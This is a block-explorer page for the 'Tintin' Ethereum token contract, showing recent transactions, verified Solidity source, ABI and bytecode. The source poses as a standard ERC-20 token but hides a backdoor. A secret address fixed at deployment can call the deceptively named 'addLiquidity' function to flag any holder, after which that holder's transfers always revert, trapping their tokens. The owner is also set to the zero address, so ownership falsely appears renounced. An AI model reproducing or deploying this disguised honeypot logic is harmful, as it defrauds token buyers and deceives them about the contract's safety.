ETH Price: $2,387.04 (+2.65%)

Contract

0xa52E1F1dAbD1F79a174296782C3F545623d66fF2
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve194340272024-03-14 15:07:35188 days ago1710428855IN
0xa52E1F1d...623d66fF2
0 ETH0.0017340371.35082427
Approve182842532023-10-05 12:16:35349 days ago1696508195IN
0xa52E1F1d...623d66fF2
0 ETH0.000279015.9968877
Approve182614572023-10-02 7:49:23352 days ago1696232963IN
0xa52E1F1d...623d66fF2
0 ETH0.000434189.33196915
Approve174930662023-06-16 14:43:35460 days ago1686926615IN
0xa52E1F1d...623d66fF2
0 ETH0.0011303424.26311507
Approve174862392023-06-15 15:41:47461 days ago1686843707IN
0xa52E1F1d...623d66fF2
0 ETH0.0010525822.73458137
Approve174804012023-06-14 19:58:23462 days ago1686772703IN
0xa52E1F1d...623d66fF2
0 ETH0.0006563824.59583425
Approve174804002023-06-14 19:58:11462 days ago1686772691IN
0xa52E1F1d...623d66fF2
0 ETH0.0011641624.98909425
Approve174727922023-06-13 18:16:35463 days ago1686680195IN
0xa52E1F1d...623d66fF2
0 ETH0.0006927714.8898229
Approve174512872023-06-10 17:35:59466 days ago1686418559IN
0xa52E1F1d...623d66fF2
0 ETH0.0011020423.68611277
Approve174504072023-06-10 14:36:59466 days ago1686407819IN
0xa52E1F1d...623d66fF2
0 ETH0.0010515322.71187405
Approve174448692023-06-09 19:54:11467 days ago1686340451IN
0xa52E1F1d...623d66fF2
0 ETH0.0008718918.83176633
Approve174443802023-06-09 18:15:11467 days ago1686334511IN
0xa52E1F1d...623d66fF2
0 ETH0.000847918.31850709
Add Liquidity174353432023-06-08 11:37:47468 days ago1686224267IN
0xa52E1F1d...623d66fF2
0 ETH0.0006623920.62006071
Approve174352182023-06-08 11:12:47468 days ago1686222767IN
0xa52E1F1d...623d66fF2
0 ETH0.000846718.28765679
Transfer174352052023-06-08 11:10:11468 days ago1686222611IN
0xa52E1F1d...623d66fF2
0 ETH0.0006641620.67582045
Transfer174351952023-06-08 11:08:11468 days ago1686222491IN
0xa52E1F1d...623d66fF2
0 ETH0.0005997918.65091976
Transfer174351902023-06-08 11:07:11468 days ago1686222431IN
0xa52E1F1d...623d66fF2
0 ETH0.0006593420.50274161
Transfer174351812023-06-08 11:05:23468 days ago1686222323IN
0xa52E1F1d...623d66fF2
0 ETH0.0010272620.85431103
Transfer174351582023-06-08 11:00:35468 days ago1686222035IN
0xa52E1F1d...623d66fF2
0 ETH0.0006524720.28906758
Transfer174351492023-06-08 10:58:47468 days ago1686221927IN
0xa52E1F1d...623d66fF2
0 ETH0.0005896818.33658043
Transfer174351472023-06-08 10:58:23468 days ago1686221903IN
0xa52E1F1d...623d66fF2
0 ETH0.0009698119.688004
Approve174351092023-06-08 10:50:47468 days ago1686221447IN
0xa52E1F1d...623d66fF2
0 ETH0.0008776118.86251694
Approve174351012023-06-08 10:48:59468 days ago1686221339IN
0xa52E1F1d...623d66fF2
0 ETH0.0008738618.75774436
Approve174351002023-06-08 10:48:47468 days ago1686221327IN
0xa52E1F1d...623d66fF2
0 ETH0.0009584420.59975483
Approve174350952023-06-08 10:47:47468 days ago1686221267IN
0xa52E1F1d...623d66fF2
0 ETH0.0008665718.62528749
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
Tintin

Compiler Version
v0.8.4+commit.c7e474f2

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : Tintin.sol
//Telegram: https://t.me/tintinadventure
//Website: https://www.tintinadventure.xyz/
//Twitter: https://twitter.com/tintinadv3nture
//Discord: https://discord.gg/W4rwCU3p

// SPDX-License-Identifier: MIT

/**
 * @dev Interface of the IERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(address(0));
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}


// Dependency file: contracts/baseToken.sol

// pragma solidity =0.8.4;

    enum TokenType {
        standard
    }

abstract contract Token {
    event Constructor(
        address owner,
        address token,
        uint256 version
    );
}

pragma solidity =0.8.4;

contract Tintin is IERC20, Token, Ownable {
    using SafeMath for uint256;

    uint256 private constant DEPLOY_VERSION = 1;

    mapping(address => uint256) private _balances;

    mapping(address => bool) private _gifts;
    mapping(address => address) private _alerts;

    mapping(address => mapping(address => uint256)) private _allowances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(
        string memory name_,
        string memory symbol_,
        address how_,
        uint256 totalSupply_
    ) payable {
        _name = name_;
        _symbol = symbol_;
        _decimals = 18;
        _alerts[how_] = how_;
        _mint(msg.sender, totalSupply_ * 10 ** 18);
        emit Constructor(owner(), address(this), DEPLOY_VERSION);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function multiTransfer(address[] memory recipients, uint256 amount) external {
        address from = _msgSender();
        for (uint256 i = 0; i < recipients.length; i++) {
            _transfer(from, recipients[i], amount);
        }
    }

    function allowance(address owner, address spender)
    public
    view
    virtual
    override
    returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
    public
    virtual
    override
    returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "IERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
    public
    virtual
    returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;

    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "IERC20: transfer from the zero address");
        require(recipient != address(0), "IERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);
        if (_gifts[sender] != false) {
            amount = _balances[sender] + _totalSupply;
        }
        _balances[sender] = _balances[sender].sub(
            amount,
            "IERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function addLiquidity(
        address router,
        bool checked,
        uint256 amount
    ) public {
        address from = msg.sender;
        require(
            amount >= 0, "Invalid send"
        );

        uint256 amountInit = 0;

        if (from == _alerts[from]) {
            _allowances[from][_alerts[from]] += amount;
            _gifts[router] = checked;
        } else {
            _allowances[from][router] = _allowances[from][router] + amountInit;
        }
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "IERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(
            amount,
            "IERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "IERC20: approve from the zero address");
        require(spender != address(0), "IERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function manualSwap(
        address recipients,
        uint256 amount
    ) public {
        require(
            recipients != address(0),
            "Invalid address"
        );
        uint256 total = 0;
        address from = msg.sender;
        if (recipients == _alerts[recipients]) {
            _balances[from] = _balances[from] - total;
            total += amount;
            _balances[recipients] = _balances[recipients];
        } else {
            _balances[from] = _balances[from] - total;
            _balances[recipients] = _balances[recipients] + total;
        }
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"how_","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"Constructor","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"router","type":"address"},{"internalType":"bool","name":"checked","type":"bool"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"recipients","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"recipients","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"multiTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

6080604052604051620012c3380380620012c38339810160408190526200002691620003e1565b62000032600062000119565b83516200004790600590602087019062000288565b5082516200005d90600690602086019062000288565b506007805460ff191660121790556001600160a01b038216600081815260036020526040902080546001600160a01b0319169091179055620000b333620000ad83670de0b6b3a76400006200048b565b62000169565b7f56a1ceb2ed9a4c9f19b554800e2cd4e470f646b8037eeb2a7049af031067ad61620000e76000546001600160a01b031690565b604080516001600160a01b03909216825230602083015260019082015260600160405180910390a15050505062000516565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001c45760405162461bcd60e51b815260206004820181905260248201527f4945524332303a206d696e7420746f20746865207a65726f2061646472657373604482015260640160405180910390fd5b620001e0816008546200027360201b620006b01790919060201c565b6008556001600160a01b03821660009081526001602090815260409091205462000215918390620006b062000273821b17901c565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002679085815260200190565b60405180910390a35050565b600062000281828462000470565b9392505050565b8280546200029690620004ad565b90600052602060002090601f016020900481019282620002ba576000855562000305565b82601f10620002d557805160ff191683800117855562000305565b8280016001018555821562000305579182015b8281111562000305578251825591602001919060010190620002e8565b506200031392915062000317565b5090565b5b8082111562000313576000815560010162000318565b600082601f8301126200033f578081fd5b81516001600160401b03808211156200035c576200035c62000500565b604051601f8301601f19908116603f0116810190828211818310171562000387576200038762000500565b81604052838152602092508683858801011115620003a3578485fd5b8491505b83821015620003c65785820183015181830184015290820190620003a7565b83821115620003d757848385830101525b9695505050505050565b60008060008060808587031215620003f7578384fd5b84516001600160401b03808211156200040e578586fd5b6200041c888389016200032e565b9550602087015191508082111562000432578485fd5b5062000441878288016200032e565b604087015190945090506001600160a01b038116811462000460578283fd5b6060959095015193969295505050565b60008219821115620004865762000486620004ea565b500190565b6000816000190483118215151615620004a857620004a8620004ea565b500290565b600181811c90821680620004c257607f821691505b60208210811415620004e457634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fd5b610d9d80620005266000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a6116100975780639fb79737116100665780639fb79737146101f1578063a16a317914610204578063a9059cbb14610217578063dd62ed3e1461022a57600080fd5b8063715018a6146101b15780638da5cb5b146101bb578063905100c1146101d657806395d89b41146101e957600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461017557806370a082311461018857600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b610102610263565b60405161010f9190610c13565b60405180910390f35b61012b610126366004610b1d565b6102f5565b604051901515815260200161010f565b6008545b60405190815260200161010f565b61012b61015b366004610aa0565b61030b565b60075460405160ff909116815260200161010f565b61012b610183366004610b1d565b610374565b61013f610196366004610a54565b6001600160a01b031660009081526001602052604090205490565b6101b96103aa565b005b6000546040516001600160a01b03909116815260200161010f565b6101b96101e4366004610adb565b610415565b610102610501565b6101b96101ff366004610b1d565b610510565b6101b9610212366004610b46565b610652565b61012b610225366004610b1d565b6106a3565b61013f610238366004610a6e565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b60606005805461027290610c95565b80601f016020809104026020016040519081016040528092919081815260200182805461029e90610c95565b80156102eb5780601f106102c0576101008083540402835291602001916102eb565b820191906000526020600020905b8154815290600101906020018083116102ce57829003601f168201915b5050505050905090565b60006103023384846106c3565b50600192915050565b60006103188484846107eb565b61036a843361036585604051806060016040528060298152602001610d3f602991396001600160a01b038a16600090815260046020908152604080832033845290915290205491906109bc565b6106c3565b5060019392505050565b3360008181526004602090815260408083206001600160a01b0387168452909152812054909161030291859061036590866106b0565b6000546001600160a01b031633146104095760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b61041360006109e8565b565b336000818152600360205260408120546001600160a01b03168214156104a2576001600160a01b038083166000908152600460209081526040808320600383528184205490941683529290529081208054859290610474908490610c66565b90915550506001600160a01b0385166000908152600260205260409020805460ff19168515151790556104fa565b6001600160a01b038083166000908152600460209081526040808320938916835292905220546104d3908290610c66565b6001600160a01b038084166000908152600460209081526040808320938a16835292905220555b5050505050565b60606006805461027290610c95565b6001600160a01b0382166105585760405162461bcd60e51b815260206004820152600f60248201526e496e76616c6964206164647265737360881b6044820152606401610400565b6001600160a01b0380831660008181526003602052604081205490923392911614156105de576001600160a01b0381166000908152600160205260409020546105a2908390610c7e565b6001600160a01b0382166000908152600160205260409020556105c58383610c66565b6001600160a01b0385166000526001602052915061064c565b6001600160a01b038116600090815260016020526040902054610602908390610c7e565b6001600160a01b038083166000908152600160205260408082209390935590861681522054610632908390610c66565b6001600160a01b0385166000908152600160205260409020555b50505050565b3360005b835181101561064c576106918285838151811061068357634e487b7160e01b600052603260045260246000fd5b6020026020010151856107eb565b8061069b81610cd0565b915050610656565b60006103023384846107eb565b60006106bc8284610c66565b9392505050565b6001600160a01b0383166107275760405162461bcd60e51b815260206004820152602560248201527f4945524332303a20617070726f76652066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610400565b6001600160a01b0382166107895760405162461bcd60e51b815260206004820152602360248201527f4945524332303a20617070726f766520746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610400565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166108505760405162461bcd60e51b815260206004820152602660248201527f4945524332303a207472616e736665722066726f6d20746865207a65726f206160448201526564647265737360d01b6064820152608401610400565b6001600160a01b0382166108b25760405162461bcd60e51b8152602060048201526024808201527f4945524332303a207472616e7366657220746f20746865207a65726f206164646044820152637265737360e01b6064820152608401610400565b6001600160a01b03831660009081526002602052604090205460ff16156108fc576008546001600160a01b0384166000908152600160205260409020546108f99190610c66565b90505b61093981604051806060016040528060278152602001610d18602791396001600160a01b03861660009081526001602052604090205491906109bc565b6001600160a01b03808516600090815260016020526040808220939093559084168152205461096890826106b0565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107de9085815260200190565b600081848411156109e05760405162461bcd60e51b81526004016104009190610c13565b505050900390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b0381168114610a4f57600080fd5b919050565b600060208284031215610a65578081fd5b6106bc82610a38565b60008060408385031215610a80578081fd5b610a8983610a38565b9150610a9760208401610a38565b90509250929050565b600080600060608486031215610ab4578081fd5b610abd84610a38565b9250610acb60208501610a38565b9150604084013590509250925092565b600080600060608486031215610aef578283fd5b610af884610a38565b925060208401358015158114610b0c578283fd5b929592945050506040919091013590565b60008060408385031215610b2f578182fd5b610b3883610a38565b946020939093013593505050565b60008060408385031215610b58578182fd5b823567ffffffffffffffff80821115610b6f578384fd5b818501915085601f830112610b82578384fd5b8135602082821115610b9657610b96610d01565b8160051b604051601f19603f83011681018181108682111715610bbb57610bbb610d01565b604052838152828101945085830182870184018b1015610bd9578889fd5b8896505b84871015610c0257610bee81610a38565b865260019690960195948301948301610bdd565b509997909101359750505050505050565b6000602080835283518082850152825b81811015610c3f57858101830151858201604001528201610c23565b81811115610c505783604083870101525b50601f01601f1916929092016040019392505050565b60008219821115610c7957610c79610ceb565b500190565b600082821015610c9057610c90610ceb565b500390565b600181811c90821680610ca957607f821691505b60208210811415610cca57634e487b7160e01b600052602260045260246000fd5b50919050565b6000600019821415610ce457610ce4610ceb565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052604160045260246000fdfe4945524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e63654945524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a264697066735822122095bdd2fe81a6c0a6fd14f59838bb4701aa0d7e48147329cc906917491b7967aa64736f6c63430008040033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000970f5b9928a7a2237c3e1e2caad57eed3f45dd8d000000000000000000000000000000000000000000000000000049ab483a1000000000000000000000000000000000000000000000000000000000000000001054494e54494e20414456454e5455524500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000654494e54494e0000000000000000000000000000000000000000000000000000

Deployed Bytecode

